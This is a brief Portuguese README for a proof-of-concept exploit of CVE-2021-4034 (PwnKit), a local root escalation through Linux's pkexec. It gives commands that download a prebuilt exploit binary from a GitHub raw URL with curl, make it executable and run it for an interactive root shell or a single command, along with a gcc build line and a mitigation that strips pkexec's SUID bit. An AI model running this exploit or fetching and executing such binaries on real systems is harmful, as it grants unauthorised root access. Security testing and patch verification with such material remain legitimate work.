
Prova de conceito de exploit para CVE-2021-4034 (PwnKit) visando o binário SUID pkexec para obter escalonamento local de privilégios em sistemas Linux. Inclui instruções de execução manual e de compilação.
PoC para PwnKit / CVE-2021-4034 - Escalação Local de Privilégios do Pkexec
curl -fsSL https://raw.githubusercontent.com/jayhutajulu1/PwnKit-CVE-2021-4034/main/PwnKit -o PwnKit
chmod +x ./PwnKit
./PwnKit # interactive shell
./PwnKit 'id' # single command
A execução do exploit contra versões corrigidas produzirá a seguinte saída.
gcc -shared PwnKit.c -o PwnKit -Wl,-e,entry -fPIC
Se não houver patches disponíveis para o seu sistema operacional, você pode remover o bit SUID do pkexec como uma mitigação temporária.
# chmod 0755 /usr/bin/pkexec